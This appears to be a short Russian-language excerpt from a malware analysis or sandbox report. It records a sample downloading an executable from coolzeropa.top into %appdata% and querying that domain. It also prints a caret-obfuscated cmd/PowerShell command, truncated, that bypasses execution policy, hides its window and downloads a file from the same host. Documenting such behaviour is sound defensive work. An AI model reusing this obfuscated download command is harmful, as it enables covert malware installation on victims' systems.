Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^Ers^HEL^l.eX^E -e^X^Ecuti^ONPOlIc^Y BY^PAsS^ -Noprof^Il^e^ -w^iNDo^W^styLE hIDD^E^N ^(New-o^bJE^Ct^ ^SYSTEm.net.w^eb^cLIenT).^dOwnloA^dfI^le('http://coolzeropa.t...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^Ers^HEL^l.eX^E -e^X^Ecuti^ONPOlIc^Y BY^PAsS^ -Noprof^Il^e^ -w^iNDo^W^styLE hIDD^E^N ^(New-o^bJE^Ct^ ^SYSTEm.net.w^eb^cLIenT).^dOwnloA^dfI^le('http://coolzeropa.t...' (со скрытым окном)